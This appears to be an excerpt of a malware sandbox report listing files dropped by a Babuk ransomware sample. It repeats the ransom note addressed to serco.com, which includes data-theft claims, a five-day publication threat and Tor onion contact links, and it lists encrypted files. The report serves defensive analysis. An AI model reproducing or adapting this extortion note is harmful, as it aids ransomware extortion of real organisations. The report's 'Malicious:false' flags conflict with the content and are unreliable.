                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.542257899264048
                                                                            Encrypted:false
                                                                            SSDEEP:3:tl2By2eG1BKLRC0syBKwLgRHm1Id7w9BNTCYR2EOKuRGrvW+Nc9UxNvEEn:mBoEgsRHm1+M9BNTBgEOKu+vWD0vtn
                                                                            MD5:D58EB523A2B5118E88393E48F109D8C4
                                                                            SHA1:37CF6B2D8CEA73B88B980DCBB24ED63E540D9F4B
                                                                            SHA-256:6BEFF51EEB12D620D672BC8687220A970E69EA6E7F4812DE725051242D7A8E20
                                                                            SHA-512:2BB9FE92EDBE61B5C9BB7A43C0ED03B95FADED735A1BFE30C108753DB5A92E7BBE732DD0A0697C518EC584EBFF6983B84A06B87FE574E76ECFF2B640D366EECB
                                                                            Malicious:false
                                                                            Preview: .........Or.`.{c..O'....$..C...h].KY...7....]d...tU&r..$PJ.@.r.<....0m{I.tvZ..?.......d.i...T.....v......A!....u.....w.D...iic....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977224592381339
                                                                            Encrypted:false
                                                                            SSDEEP:192:8ijQ1X3QxsUHnZxZHBodH+S22H6kuafaJLWzNaN7g8S7kK:nQVAFBodeSbH61azzNaNkb
                                                                            MD5:51F6EE2430619E444A9F227B8A62729D
                                                                            SHA1:CA86F67B05DDC2EA5E652DD4DD64237BB3BE4BD1
                                                                            SHA-256:00A357A90AE1BABC24D37656CF40C4F148B431DB6DBACD46DDE46A2A5F360E41
                                                                            SHA-512:A5F1C1A907E5607EFF3CA33F9123D7A8296A13D44B7116B1F06D0FECF0B2EEF91376724A6FF6E36AF6E332793EFC8A654609193F142965438A7B309F96B51160
                                                                            Malicious:false
                                                                            Preview: .D..5].....i.\$;sw..~9...(..s. ..!.E...S..9....E+...".....i9j.S ..|.42.o.7LC....z5.L`.a.....O..KY.......!..`.v[.2...I.z.QSE.`.iR.8.l...(.aa\.h..[...f...t...P=.4e.O9|..>..(....FY.5...t...h....@....W.!....o=...<.p..S..^..v.p..A*j..j..B5:.X&.....N..Q...1J.X...9^`.........I..+...A.]\?T.<.'..!.>.?.F...+G.......cv..$$Ll..)^...\|..r...y../m`....?#.R...f..\.I#..WE.]v.......A.6B.....Z..L......."`.N..`..w...n......-.-.i.$.6.%Q..n_W..P6..0.%...}TV-.=T.1..U.+......Z./+..u.eX)...h]..~(.....C.....~.D..si.X..-.Q&.....8'.)..!.2.."..,..)km.&-..>b.H.J.....zfZ.\:/-.-9!.q.;.1.\#....v..i..Q.eH...sPH.3g.KV..@.|....0..........-u..i..z$.eG,xu.3.'x%r.3....=R.>.Yi....9..^.?*\.......D...Q...=s%....XL.a...$.......dr......./j.....,.|\.P^d)V.......`.|.I.U...........D..1`'.......3+._.<.>y..~.2}....HIv..:..g.......p.....3....;n./.M.&.2...F.tkW...b.8S0..2].&@D..._...G.C..kD=J.......M.b$q..T.j..2.S..D,.. .4<..B...:D.K..G.6...cX...;.g"j....8.2..E..]./z..A!......f...,....ww
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.610768464765994
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlfQIpxpLo+qzZIPBDzPIITxPIpVfqEm0ayt9UxNvEEn:P5pLoVzZIPBHxxgffqPE0vtn
                                                                            MD5:488302E694929ABE6788E8B41473FB8D
